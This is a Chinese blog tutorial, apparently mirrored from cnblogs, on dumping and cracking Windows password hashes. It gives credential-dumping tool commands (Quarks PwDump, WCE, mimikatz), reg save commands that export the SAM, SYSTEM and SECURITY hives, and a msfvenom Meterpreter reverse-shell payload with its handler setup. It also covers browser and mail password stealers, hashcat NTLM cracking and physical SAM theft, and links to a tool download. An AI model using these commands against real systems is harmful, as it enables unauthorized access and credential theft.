zoukankan      html  css  js  c++  java
  • Windows密码获取和破解(初探)

    Windows密码获取和破解

    本文只是简单的讲明密码获取和破解

    具体的操作细节均以模糊或具体代码混淆等方式避开

    如有兴趣请自行研究,本文不做细说~~~

    获取思路:

    Windows密码一般是以“哈希值”进行加密保存,我们获取破解密码哈希值就可以获得密码了~

    • 通过0day直接获得权限;通过工具(WCE)或者漏洞(MS08-067溢出获得system权限)
    • 内网环境下通过嗅探扫描探测,暴力破解获取系统密码
    • 本地直接获得密码(读取系统system文件下的config所有文件逐一分析)

    密码获取工具:

    gethash、gsecdump、Quarks PwDump、Pwdump、mimikatz、WCE……

    Quarks PwDump:

    是一款Windows下用户密码提取的开源工具,可以抓取Windows平台下多种类型的用户凭证,包括本地账户、域账户、缓存的域账户和Bitlocker的提取。

    Quarks PwDump -dh1 		 // 导出本地哈希值
    Quarks PwDump -dhdc 	 // 导出内存中域账户哈希值
    Quarks PwDump -dhd  	 // 导出域哈希值(指定NTDS文件)
    

    WCE:

    是一款功能强大的Windows平台的内网渗透工具,可以列举登录会话,并且可以添加、变更、删除相关的凭证数据。是内网渗透的必备工具之一

    wce -a //获取所有账户哈希值
    

    reg命令:导出密码文件

    通过执行reg命令将SAM、System、SECURITY等文件内容导出到文件中

    reg save hklmsam sam.hive
    reg save hklmsystem system.hive
    reg save hklmsecurity security.hive
    

    命令执行后将会将文件保存在本地~

    PowerShell获取:

    PowerShell加载mimikatz模块获取密码,通过执行该ps脚本即可获取Windows密码

    MSF反弹hashdump及mimikatz获取:

    通过MSF生成反弹shell或直接溢出获取反弹shell,在MSF下执行hashdump即可~

    • 生成反弹木马:

      > msfvenom -p windows/metpreter/reverse_tcp LHOST=192.168.2.196 LPORT=443 -f exe -o met.exe
      
    • MSF使用反弹处理模块

      > use exploit/multi/handler
      > set PAYLOAD windows/meterpreter/reverse_tcp
      > set LHOST 192.168.2.0
      > set LPORT 443
      > exploit
      
    • 提权操作……

    其它小工具

    下列小工具在Windows平台运行就会获得相关的用户凭证……

    mailpv:获取mail密码
    mspass:获取MSN密码

    pst_password:获取Outlook密码

    IE PV:获取IE浏览器缓存密码

    各类浏览器密码获取工具

    passwordfox:获取Firefox浏览器凭证

    chromepass:获取谷歌浏览器凭证

    无线网络密码获取工具
    远程桌面密码获取:

    rdpv —— cmdkey/list —— netpass.exe

    破解密码哈希值

    在线破解:

    • CMD5官网
    • ophcrack在线破解

    ophcrack破解:

    导入哈希值,加载Tables,执行Crack~

    hashcat破解:

    最流行的、最快的密码破解工具

    1570306100485

    破解:

    将准备好的字典password.lst和需要破解的哈希值文件win.hast,复制到hashcat32程序文件夹下,执行命令破解:

    hashcat -m 1000 -a 0 -o winpassok.txt win.hash password.lst --username
    

    -m 1000 表示破解密码类型为NTLM

    -a 0 表示采用字典破解

    -o [feilname].txt 表示将破解后的文件输出到指定的文件中

    --remove win.hash 表示从win.hash移除破解成功的hash,密码中有username不能与remove参数同时使用,也可以单一破解

    password.lst 密码字典文件

    物理获取密码

    获取SAM和SYSTEM文件

    文件通常在C:WindowsSystem32config目录下存放(通常会使用系统盘PE系统进入并拿走文件),找到文件并拷贝:SAM SYSTEM SECURITY 三个文件

    导入文件

    使用SAMInside软件将三个文件导入到软件中,之后软件就会告知Hash值~

    破解哈希密码

    导出需要破解的哈希密码值,赋值拷贝到ophcrack软件中进行破解

    【工具下载:https://pan.baidu.com/s/1w2HDmxBAnQg9vtbv-DoW-A】

  • 相关阅读:
    django 在保存数据前进行数据校验
    itertools
    python 发送请求
    python 异常处理
    python 对redis 键值对的操作
    python 对redis key的基本操作
    python 操作redis数据
    一只青蛙一次可以跳1阶或者2阶,n阶,有多少种到达终点的方式。
    Django 自定义扩展命令
    关于函数可变参数
  • 原文地址:https://www.cnblogs.com/wangyuyang1016/p/11626326.html
Copyright © 2011-2022 走看看